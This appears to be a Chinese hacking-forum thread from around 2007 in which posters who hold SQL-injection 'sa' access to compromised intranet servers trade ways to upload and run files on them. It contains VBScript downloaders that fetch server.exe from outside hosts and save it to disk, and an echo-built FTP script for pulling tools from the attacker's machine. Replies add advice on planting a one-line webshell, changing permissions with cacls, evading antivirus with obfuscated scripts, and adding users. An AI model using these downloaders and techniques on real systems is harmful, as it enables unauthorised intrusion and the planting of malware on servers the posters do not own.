议题作者：wangle
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

得到一个注入点，内网。
以前看到大家在讨论sa权限无法上传文件的问题，我的这个站SA权限，能执行系统命令，但是还是传不上去。
写了一个down.vbs

复制内容到剪贴板

代码:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","[url]http://www.nbrcw.com/server.exe[/url]",0  
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()  
sGet.Write(xPost.responseBody)
sGet.SaveToFile "server.exe",2

提示

引用:

c:\down.vbs(3, 1) msxml3.dll: 系统未找到指定的资源。

复制内容到剪贴板

代码:

iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3

执行后提示

引用:

c:\down1.vbs(1, 1) Microsoft VBScript 运行时错误: 下标越界

复制内容到剪贴板

代码:

sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

FTP不行更加不行，我怀疑我人品真的有问题。

如果是web服务器，找到他的IIS目录，然后echo一个一句话木马，再用马传文件。
如果是数据库服务器，除了lz试过的方法，还可以在自己的机子上架一个Tftp服务，用tftp传文件。
//
啊D有一个mssql，sa权限上传文件的工具，不过原理好像和down.vbs差不多。
下载地址http://www.d99net.net/article.asp?id=104

我想知道 提示错误的原因
是数据库服务器 都试了tftp也不行

telnet自己机器一下，能通的话就用tftp看看，不过基本上不成功。

用20CN 开自己的FTP 在用echo命令写个文件到服务器 这样试试能不能传上去
比如: echo open your ip >ftp.txt
      echo  your name >>ftp.txt
      echo  your pass >>ftp.txt
     echo get your files >>ftp.txt
     echo bye >>ftp.txt
然后运行 ftp -s:ftp.txt   前提是对方服务器的ftp.exe没有改名

转换成二进制,再用文本的方式传上去,虽然传输过程比较慢,但比较有效,传上去再恢复就ok了.

我也遇到一台鸡肉~~~ 有SA权限~~ 装了瑞星防火墙~~和瑞星杀软~~
不开21~不开3389~ 连WEBSHELL都没办法上~
无论哪个WEB目录都没有写权~~用ECHO上了down.vbs也下不得文件~~原因不明[s:39]
SA权限很大~ 可以增加用户~
感觉超变态~~~哪位大哥给指点小第一二

[s:38] 7楼的，SA权限如论哪个目录都没写权限？cacls改之。。瑞星直接好像停不了，VBS下不了，那有可能是让瑞星干掉了，直接改权限写一句话，不是非得上大马才算WEBSHELL。。有个一句话C/S端就行了，然后你再干什么还不行？

原来自己也遇到过这个情况，最后发现是装了,mcafee。

引用:

引用第9楼守护天使于2007-01-28 21:47发表的:
[s:38] 7楼的，SA权限如论哪个目录都没写权限？cacls改之。。瑞星直接好像停不了，VBS下不了，那有可能是让瑞星干掉了，直接改权限写一句话，不是非得上大马才算WEBSHELL。。有个一句话C/S端就行了，然后你再干什么还不行？

首先~~感谢你的意见~~ 但是我试过了~~运行cacls可以~~但就是改不得~~原因还是不明~呵呵~
一句话C/S端我有~可以利用lake2写的WEBSHELL~新建删除修改文件~都没问题~但就是不能在WEB目录下实行~也不能下载文件~到任何目录~VBS是免杀的~我在自己电脑试过可以下载~~上传到鸡肉就用不得了~也没被删除~~

我想多数是防火墙在作怪~~

朋友~~还有什么高招吗？？ 呵呵~~ [s:39]  [s:39]

楼主不防试试服务器有没有设置DNS
我曾遇到一个就是服务器没有设置DNS

引用:

引用第6楼凋凌玫瑰于2007-01-23 01:37发表的 :
转换成二进制,再用文本的方式传上去,虽然传输过程比较慢,但比较有效,传上去再恢复就ok了.

大哥，这个具体怎么用呀？怎么转成二进制？再在CMD中远程恢复？

msxml3.dll: 系统未找到指定的资源 重新注册下

ANY2BAT
转过去.
然后在上传..OK后直接在CMD里XX.BAT.
他会自动释放出XX.EXE文件.

VBS下载不了马可能是因为服务器的IE设置了不可访问非法站点``

1：删除了msxml3.dll也是不传用echo上传的
2：有防火墙
3：FTFP不能用于2003

可否单独PM我试下，乐于尝试
感觉有可能拿下的哦

此发言被投诉

关于第一个VBS脚本无法执行的问题,楼主可以试试下面这个:

复制内容到剪贴板

代码:

Set Post = CreateObject("Msxml2.XMLHTTP")
Post.Open "GET","http://www.eviloctal.com/server.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\setup.exe",2

貌似与

复制内容到剪贴板

代码:

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","[url]http://www.nbrcw.com/server.exe[/url]",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "server.exe",2

用的是不同组件.....或者试试有没办法能把135转出来(我菜..好像还没听说过这样的方法,不知有没牛人能提供),然后Recton传....

另关于VBS被杀的问题,FST出了一个VBS变形的工具,变形后我暂时没发现有什么服务器会杀,变形后文件可直接cscript执行.

引用:

引用第12楼hushui于2007-05-10 08:57发表的 :
msxml3.dll: 系统未找到指定的资源 重新注册下

小弟不才 不知道怎么注册?能否说明确点
想用
echo wscript.echo "PID ProcessName">>1.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe
方法重启2000
但是
C:\>echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
不正常地定义参数对象。提供了不一致或不完整的信息。
怎么回事

SA权限.. cacls 修改权限 还是无法上传和写入....
  什么盘都不行......
                     请各位大虾..赐教..

[quote]引用第21楼不走寻常路于2007-09-16 18:29发表的 :
SA权限..

引用:

引用第22楼hackest于2007-09-16 19:50发表的 :

是否确定SA没被降权？！
是否确定cacls.exe修改文件访问属性成功？！

可以执行 命令..     修改也成功;了   就是无法写入..
   

你在VBS脚本最上面加一句容错代码就可以搞定了